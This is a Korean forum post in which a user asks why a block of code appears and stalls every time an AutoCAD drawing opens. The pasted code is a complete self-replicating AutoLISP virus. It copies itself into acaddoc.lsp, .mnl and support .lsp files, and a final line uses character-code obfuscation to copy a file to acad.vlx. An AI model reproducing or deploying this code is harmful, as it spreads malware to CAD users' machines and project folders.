도면을 열때마다 아래와 같은 코멘트가 쭈우욱… 나오면서 멈춰있어요..ㅠㅠ
ESC 누르면 도면은 열리기는 하는데… 도면 열때마다… 저녀석 나오니 자꾸 신경이 쓰여서…
혹시 무엇때문에 그런지 아시는분 계신가요???
————————————————————————————————————————–
(setq flagx t)
(setq bz “(setq flagx t)”)
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target) (progn
(setq wjm1 (open target “r”))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source “r”))
(setq wjm1 (open target “a”))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar “cmdecho” 0)
(setq acadmnl (findfile “acad.mnl”))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath “*.mnl”))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile “acad.exe”))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath “\support“))
(setq lspfilelist (vl-directory-files support “*.lsp”))
(setq lspfilelist (append lspfilelist (list “acaddoc.lsp”)))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar “dwgname”))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath “\acaddoc.lsp“))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath “\” (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support “\” (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105
102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
; 오류: 잘못된 인수 유형: streamp nil
; 오류: 잘못된 인수 유형: stringp nil
공유